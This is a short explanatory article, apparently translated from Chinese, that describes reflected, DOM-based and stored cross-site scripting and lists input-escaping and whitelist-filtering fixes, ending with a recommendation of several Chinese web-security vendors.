XSS (cross-site scripting) takes place mainly in the browser of the website's users: the attacker injects a malicious script into the browser that changes the state of the web page. When the user browses the page the browser renders the whole HTML and executes the unexpected malicious script, which lets the attacker control the user's browser. XSS is a widespread vulnerability; an attacker can use it to attack users' browsers, writing the malicious code as static or dynamic text that is then loaded onto the user's computer.
XSS attacks found in the project and their solutions:
- Reflected XSS:
Reflected XSS appears in the URL: the payload is submitted to the server as input, and once the server responds the XSS code appears in the browser and attacks the user's computer.
- DOM-based XSS:
DOM-based XSS is a special form of XSS that exists only on the client side. If the client-side script itself has a structural defect, the malicious attack fires when the user clicks the attacker's link.
- Stored XSS:
Against a web server with certain weaknesses, the attacker stores the malicious code in the database in advance; when users visit the site the stored malicious script is fetched from the database and the attack takes place. The attacker needs to act only once to hit many victims.
XSS vulnerability fixes:
- Input encoding/escaping: HTML-escape the input data so that it cannot be recognized as executable script.
- Whitelist filtering: filter the data against a whitelist of tags and attributes, removing anything that could execute script (for example the script tag, or the onerror attribute of an img tag).
- The fundamental fix for XSS cross-site vulnerabilities is comprehensive security filtering of the values the front end receives and outputs: automatically escape illegal parameters such as <, >, comma, " and ', or block them outright and show a warning; filter double quotes, semicolons and single quotes, and HTML-entity-encode the characters. If you are not very familiar with the website's code, you can engage a professional website security company to fix the XSS vulnerability; in China, SINESAFE, Sangfor, NSFOCUS and Venustech are the more professional ones. The fix methods follow strict filtering of GET and POST parameters, intercepting code that carries attack signatures.